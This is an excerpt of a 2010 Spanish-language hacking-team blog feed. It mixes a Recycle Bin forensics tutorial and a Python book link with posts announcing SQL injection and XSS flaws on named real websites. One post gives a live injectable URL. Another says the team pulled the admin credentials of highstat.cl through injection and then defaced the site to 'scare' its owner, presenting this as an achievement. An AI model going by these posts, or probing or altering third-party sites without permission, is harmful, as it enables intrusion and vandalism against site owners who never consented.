rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2942484174771706273</id><published>2010-08-06T19:39:00.000-07:00</published><updated>2010-08-07T12:57:24.259-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='Informatica forense'/><title type='text'>Introduccion a la Informatica Forense</title><content type='html'>El &lt;b&gt;&lt;span style="color: red;"&gt;c&lt;/span&gt;&lt;span style="color: red;"&gt;ómputo forense&lt;/span&gt;&lt;/b&gt;, también llamado&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;b style="color: red;"&gt;informática forense&lt;/b&gt;, &lt;b style="color: red;"&gt;computación forense&lt;/b&gt;, &lt;b style="color: red;"&gt;análisis forense digital&lt;/b&gt; o &lt;b style="color: red;"&gt;examinación forense digital&lt;/b&gt;  es la aplicación de técnicas científicas y analíticas especializadas a  infraestructura tecnológica que permiten identificar, preservar,  analizar y presentar datos que sean válidos dentro de un proceso legal.&lt;br /&gt;&lt;br /&gt;Dichas técnicas incluyen reconstruir el bien informático, examinar  datos residuales, autenticar datos y explicar las características  técnicas del uso aplicado a los datos y bienes informáticos.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Recuperando Datos de la Papelera de Reciclaje &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;La papelera de reciclaje es un area de almacenamiento de la memoria que se guardan los archivos antes de que sean eliminados de una particion.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;Directorio de almacenamiento Real:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;El directorio real donde se almacenan los archivos que están en la Papelera de reciclaje varía de acuerdo al sistema operativo o al sistema de archivos que tenga la partición. Así, en el sistema de archivos FAT&lt;a class="mw-redirect" href="http://es.wikipedia.org/wiki/FAT" title="FAT"&gt;&lt;/a&gt; (usado típicamente en sistemas windows 9x), el directorio se ubica en &lt;b&gt;&lt;i style="color: red;"&gt;X:\RECYCLED&lt;/i&gt;&lt;/b&gt; (siendo &lt;i&gt;X&lt;/i&gt; una letra de la unidad cualquiera), mientras que en el sistema de archivos NFTS&lt;a href="http://es.wikipedia.org/wiki/NTFS" title="NTFS"&gt;&lt;/a&gt; y en Windows NT/2000/XP esta se encuentra en &lt;b style="color: red;"&gt;&lt;i&gt;X:\RECYCLER&lt;/i&gt;&lt;/b&gt; (siendo &lt;i&gt;X&lt;/i&gt; una letra de la unidad cualquiera), con excepción de windows vista el cual guarda los archivos en el directorio &lt;b&gt;&lt;i style="color: red;"&gt;X:\$Recycle.Bin&lt;/i&gt;&lt;span style="color: red;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;b&gt;¿Como trabaja la papelera de reciclaje?&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;span style="color: black;"&gt;Los archivos que están guardados en la Papelera de reciclaje (y por ende, en el directorio real) son renombrados como &lt;/span&gt;&lt;i style="color: black;"&gt;Dxy.ext&lt;/i&gt;&lt;span style="color: black;"&gt;, donde &lt;/span&gt;&lt;i style="color: black;"&gt;x&lt;/i&gt;&lt;span style="color: black;"&gt; es la letra de la unidad donde se encontraba este archivo (tales como "c", "d", etc.); &lt;/span&gt;&lt;i style="color: black;"&gt;y&lt;/i&gt;&lt;span style="color: black;"&gt; es un número, asignado de forma secuencial partiendo del cero; y &lt;/span&gt;&lt;i style="color: black;"&gt;ext&lt;/i&gt;&lt;span style="color: black;"&gt;  es la extensión original del archivo. Sin embargo, el nombre original  es mostrado en la Papelera, esto porque se crea un archivo oculto sin  extensión llamado "&lt;/span&gt;&lt;i style="color: black;"&gt;info2&lt;/i&gt;&lt;span style="color: black;"&gt;" ("&lt;/span&gt;&lt;i style="color: black;"&gt;info&lt;/i&gt;&lt;span style="color: black;"&gt;" en&amp;nbsp; Windows 95&lt;/span&gt;&lt;span style="color: black;"&gt;)  que almacena el nombre y la ubicación original.&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp;en el caso de que se  quisiera recuperar el archivo eliminado (por medio del comando &lt;/span&gt;&lt;i style="color: black;"&gt;Restaurar este elemento&lt;/i&gt;&lt;span style="color: black;"&gt;).&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;b&gt;Fuente Wikipedia :)&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: white; color: red; text-align: left;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Para seguir con este tutorial, vamos a hacer uso de dos herramientas, una que nos permite ver todos los archivos que fueron eliminados de la papelera de reciclaje llamda Restoration, que la pueden descargar de &lt;b&gt;&lt;a href="http://www.megaupload.com/?d=CU1QT08J"&gt;AQUI&lt;/a&gt;...&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;La otra herramienta se llama Refiuti, que es una herramienta que permite saber cuando fue eliminado un archivo, que es de vital importancia para este tema en el que nos estamos adentrando. El refiuti, lo podemos descargar de &lt;b&gt;&lt;a href="http://www.megaupload.com/?d=1PZOBX2V"&gt;AQUI&lt;/a&gt;.&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Una vez descargado e instalado el Restoration, lo abrimos, y nos va a aparecer una pantallita como esta.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img16.imageshack.us/img16/2869/79218513.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="http://img16.imageshack.us/img16/2869/79218513.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Cuando veamos esta pantallita, daremos click en el boton Search Deleted Files, esto nos buscara todos los archivos borrados.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img696.imageshack.us/img696/9871/65574876.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="502" src="http://img696.imageshack.us/img696/9871/65574876.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Esto es todo de esta herramienta, ahora pasaremos a usar rifiuti, que ya dijimos para que servia, cuando lo instalamos, lo desconmprimimos en system32 para tocar en la consola de comandos rifiuti y ya poder acceder a esta.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Bueno, como ya dijimos (por mi parte como tengo XP) la ruta donde se encuentra mi carpeta de la papelera de reciclaje, es la siguiente. &lt;b&gt;&lt;span style="color: red;"&gt;C:\Recycler&lt;/span&gt;&lt;/b&gt;&amp;nbsp; y accedemos al SID de mi papelera que es el siguiente&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;C:\RECYCLER\S-1-5-21-73586283-1202660629-725345543-500\&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Muchos se estaran preguntando ¿Como averiguo el SID de la papelera de mi sistema?&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Es facil: Si tenemos solo un usuario, vamos a&amp;nbsp;&lt;b&gt;&lt;span style="color: red;"&gt; MI PC --&amp;gt; Herramientas --&amp;gt; Opciones de carpeta --&amp;gt; Ver. y en la opciones que dice mostrar todos los archivos y carpetas ocultos, lo activamos.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: left;"&gt;&lt;b&gt;Luego, en el mismo lugar y en Ocultar archivos por el sistema operativo,&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Asi veriamos el SID de la papelera de nuestro S.O&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Bueno ahora vamos a nuestra&amp;nbsp; consola de cmd.exe y vamos a ejecutar el rifiuti&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Colocamos este codigo&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span style="color: red;"&gt;rifiuti C:\RECYCLER\S-1-5-21-73586283-1202660629-725345543-500\INFO2&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;y nos va a devolver algo como esto:&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img716.imageshack.us/img716/2601/64192119.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="310" src="http://img716.imageshack.us/img716/2601/64192119.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;ahi veriamos la fecha de eliminacion y el tamaño del archivo que hay en la papelera.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Bueno, eso fue todo.. :). Despues sacare mas tutoriales acerca de este interesante tema que es la informatica forense.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Un saludo.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: right;"&gt;&lt;b&gt;Dr [F]&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2942484174771706273?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2942484174771706273/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/introduccion-la-informatica-forense.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2942484174771706273'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2942484174771706273'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/introduccion-la-informatica-forense.html' title='Introduccion a la Informatica Forense'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2853059658719164222</id><published>2010-08-06T16:55:00.000-07:00</published><updated>2010-08-07T12:58:16.024-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>Movimiento juvenil no Pasaran [Vulnerabilidad SQLi]</title><content type='html'>Recientemente, navegando por internet, nos topamos con una web &lt;a href="http://www.np.org.ar/"&gt;http://www.np.org.ar/&lt;/a&gt;, que poseia una vulnerabilidad de tipo Sqli, esto, fue reportado al administrador de la web y esperamos el pronto parcheamiento de la misma&lt;br /&gt;&lt;br /&gt;La vulnerabilidad reside en &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.np.org.ar/noticias.php?not_id=%27"&gt;http://www.np.org.ar/noticias.php?not_id='&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img121.imageshack.us/img121/4897/sql2o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img121.imageshack.us/img121/4897/sql2o.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2853059658719164222?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2853059658719164222/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/movimiento-juvenil-no-pasaran.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2853059658719164222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2853059658719164222'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/movimiento-juvenil-no-pasaran.html' title='Movimiento juvenil no Pasaran [Vulnerabilidad SQLi]'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1104094414334408127</id><published>2010-08-05T16:53:00.000-07:00</published><updated>2010-08-05T17:39:40.524-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>Academia de la Nasa [Vulnerabilidad SQLi]</title><content type='html'>Bueno, navegando por ahi me encontre con una vulnerabilidad de tipo SQLi a la Universidad de la NASA. Esta vulnerabilidad no es comun como todas las demas, es algo diferente. Esta, no empieza con -1.&lt;br /&gt;&lt;br /&gt;No dejaremos el link vulnerable, y menos los datos sacados. Si no tienen experiencia, y consiguieron los datos, les aconsejo que no se loggeen, ya que con la pasta que tiene esta empresa, les ira mal.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Web:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt; &lt;a href="http://www.nasa-academy.org/"&gt;http://www.nasa-academy.org/&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_eBcvsaKjQp4/TFtN2SRHaEI/AAAAAAAAAKA/l4-Asx3xom0/s1600/Deface.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="492" src="http://2.bp.blogspot.com/_eBcvsaKjQp4/TFtN2SRHaEI/AAAAAAAAAKA/l4-Asx3xom0/s640/Deface.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;High Risk Security Team&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1104094414334408127?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1104094414334408127/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/academia-de-la-nasa-vulnerabilidad-sqli.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1104094414334408127'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1104094414334408127'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/academia-de-la-nasa-vulnerabilidad-sqli.html' title='Academia de la Nasa [Vulnerabilidad SQLi]'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_eBcvsaKjQp4/TFtN2SRHaEI/AAAAAAAAAKA/l4-Asx3xom0/s72-c/Deface.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-3556478876325550165</id><published>2010-08-04T02:32:00.000-07:00</published><updated>2010-08-05T17:04:10.171-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>XSS | www.minutouno.com</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="490" src="http://img808.imageshack.us/img808/8567/58883790.jpg" width="640" /&gt;&lt;/div&gt;&lt;h2 class="pagetitle" style="color: red; font-weight: normal;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/h2&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Recuerden, que tienen un manual de xss en el blog :)&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;h2 class="pagetitle"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img829.imageshack.us/img829/3793/97135348.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="490" src="http://img829.imageshack.us/img829/3793/97135348.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h2 class="pagetitle" style="font-family: Arial,Helvetica,sans-serif; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;XSS: &lt;a href="http://www.minutouno.com/"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: red; font-weight: normal;"&gt;www.minutouno.com&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-3556478876325550165?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/3556478876325550165/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwminutounocom.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3556478876325550165'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3556478876325550165'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/xss-wwwminutounocom.html' title='XSS | www.minutouno.com'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-3440923563731235999</id><published>2010-08-02T22:50:00.000-07:00</published><updated>2010-08-04T18:42:45.064-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>SQLi a Highstat.cl</title><content type='html'>Hace unos minutos, charlando con el resto del equipo llamado "High Risk Security Team", decidimos entrar en nuestra tarea de "reportar" paginas web con vulnerabilidades al descubierto (bueno, una de nuestras tareas) y nos encontramos con &lt;a href="http://www.highstat.cl/" style="color: red;"&gt;Highstat&lt;/a&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;que presentaba una vulnerabilidad de tipo SQLi. &lt;br /&gt;Este error, es visible en &lt;a href="http://highstat.cl/noticias/index.php?noti=" style="color: red;"&gt;http://highstat.cl/noticias/index.php?noti=.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Al ver esto con el equipo, decidimos "probarnos" de hasta donde podiamos llegar. Esto, nos llevo a seguir con la inyeccion hasta dar con el usuario y contraseña de la pagina. Inmediatamente de "averiguar" esos datos, conseguimos el mail, y reportamos el fallo. Pero como cada uno de nosotros sabiamos que ningun administrador te hace caso con solo mandarle un mail reportandole la vulnerabilidad, decidimos asustarlo un poco y modificar levemente la estructura de la pagina.&lt;br /&gt;&lt;br /&gt;Este es uno de los primeros logros del team y decidimos plasmarlo en una imagen en nuestro posteo, este quedara grabado por siempre en cada una de nuestras memorias.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img23.imageshack.us/img23/3323/17184332.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img23.imageshack.us/img23/3323/17184332.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img23.imageshack.us/img23/3323/17184332.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://img23.imageshack.us/img23/3323/17184332.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;High Risk Security Team&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-3440923563731235999?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/3440923563731235999/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-highstatcl.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3440923563731235999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3440923563731235999'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqli-highstatcl.html' title='SQLi a Highstat.cl'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-8462059067159436963</id><published>2010-08-02T02:32:00.000-07:00</published><updated>2010-08-02T02:37:49.228-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Python Manuales'/><title type='text'>Aprende Python con "Python Para Todos"</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://linfox.es/wp-content/uploads/2008/05/imagen-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://linfox.es/wp-content/uploads/2008/05/imagen-1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Peso: 1,21 MB&lt;br /&gt;Paginas: 160&lt;br /&gt;Tipo: .pdf&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://www.mediafire.com/?jzziy3dno4w"&gt;Click aqui para descargar [Mi Subida] &lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;i&gt;Sthefano02&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;i&gt;Bytes!&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-8462059067159436963?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/8462059067159436963/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/aprende-python-con-python-para-todos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8462059067159436963'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8462059067159436963'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/aprende-python-con-python-para-todos.html' title='Aprende Python con &quot;Python Para Todos&quot;'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1083151252405639995</id><published>2010-08-02T02:22:00.000-07:00</published><updated>2010-08-02T13:19:38.696-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Scripting'/><category scheme='http://www.blogger.com/atom/ns#' term='Python'/><title type='text'>Python: Todo sobre este gran lenguaje</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Python_logo.svg/300px-Python_logo.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://upload.wikimedia.org/wikipedia/commons/thumb/0/06/Python_logo.svg/300px-Python_logo.svg.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #666666; text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es Python?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br 